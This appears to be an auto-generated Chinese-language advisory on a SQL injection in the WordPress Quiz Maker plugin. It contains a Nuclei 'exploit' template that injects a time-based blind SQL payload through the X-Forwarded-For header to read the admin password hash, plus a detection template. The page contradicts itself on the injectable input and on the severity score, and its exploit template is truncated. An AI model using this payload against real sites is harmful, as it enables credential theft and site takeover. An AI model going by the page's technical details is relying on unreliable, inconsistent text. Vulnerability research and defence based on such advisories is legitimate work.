[webapps] WordPress Quiz Maker 6.7.0.56 - SQL Injection
CVE-2025-10042
WordPress Quiz Maker 6.7.0.56 存在SQL注入漏洞,未经认证的攻击者可通过构造特定参数执行恶意SQL语句。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-10042 |
|---|---|
| 漏洞类型 | SQL注入 |
| 受影响版本 | WordPress Quiz Maker 6.7.0.56 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2025-12-25 |
| 提交者 | Rahul Sreenivasan (Tr0j4n) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在Quiz Maker插件的某个功能中,对用户输入(如Quiz ID等参数)未进行充分的过滤或转义,直接拼接到SQL查询中,导致攻击者能够注入并执行恶意SQL语句。
🎯 攻击场景
1. 攻击者确定受影响网站运行Quiz Maker 6.7.0.56。 2. 攻击者构造包含恶意SQL语句的请求(如通过HTTP GET或POST参数传递Quiz ID等参数,参数如`id`或`quiz`等)。 3. 发送请求至服务器,服务器将恶意数据拼接到SQL查询并执行。 4. 攻击者利用返回结果提取数据库信息,如管理员密码哈希、用户数据等。
💥 漏洞影响
数据泄露:攻击者可提取所有数据库表内容(用户凭据、权限等),可能导致完全接管WordPress站点。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-10042-exploit
info:
name: WordPress Quiz Maker 6.7.0.56 - SQL Injection Exploit
author: Tr0j4n
severity: high
description: |
WordPress Quiz Maker plugin version 6.7.0.56 and below is vulnerable to SQL injection
via the X-Forwarded-For header. This exploit extracts admin credentials from the database.
reference:
- https://www.exploit-db.com/exploits/52000
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10042
classification:
cvss-score: 8.6
cve-id: CVE-2025-10042
tags: wordpress,plugin,quiz-maker,sqli
variables:
sleep_time: "3"
query: "SELECT user_pass FROM wp_users WHERE ID=1"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 1' OR IF(ASCII(SUBSTRING(({{query}}),1,1))>0,SLEEP({{sleep_time}}),0)#
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
matchers:
- type: dsl
dsl:
- "duration>=3000"
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- duration🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-10042-detection
info:
name: WordPress Quiz Maker 6.7.0.56 - SQL Injection Detection
author: Tr0j4n
severity: high
description: |
WordPress Quiz Maker plugin version 6.7.0.56 and below is vulnerable to SQL injection
via the X-Forwarded-For header. An unauthenticated attacker can exploit this to extract
sensitive information from the database.
reference:
- https://www.exploit-db.com/exploits/52000
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10042
classification:
cvss-score: 8.6
cve-id: CVE-2025-10042
tags: wordpress,plugin,quiz-maker,sqli
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "Quiz Maker"
- "ays_quiz"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'Quiz Maker.*?([0-9]+\.[0-9]+(\.[0-9]+)?)'
stop-at-first-match: true🛡️ 修复建议
升级至6.7.0.57或更高版本。临时措施:在WAF中禁用对`quiz`、`id`等输入参数的直接访问,或使用参数化查询。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:15 | 来源: Exploit-DB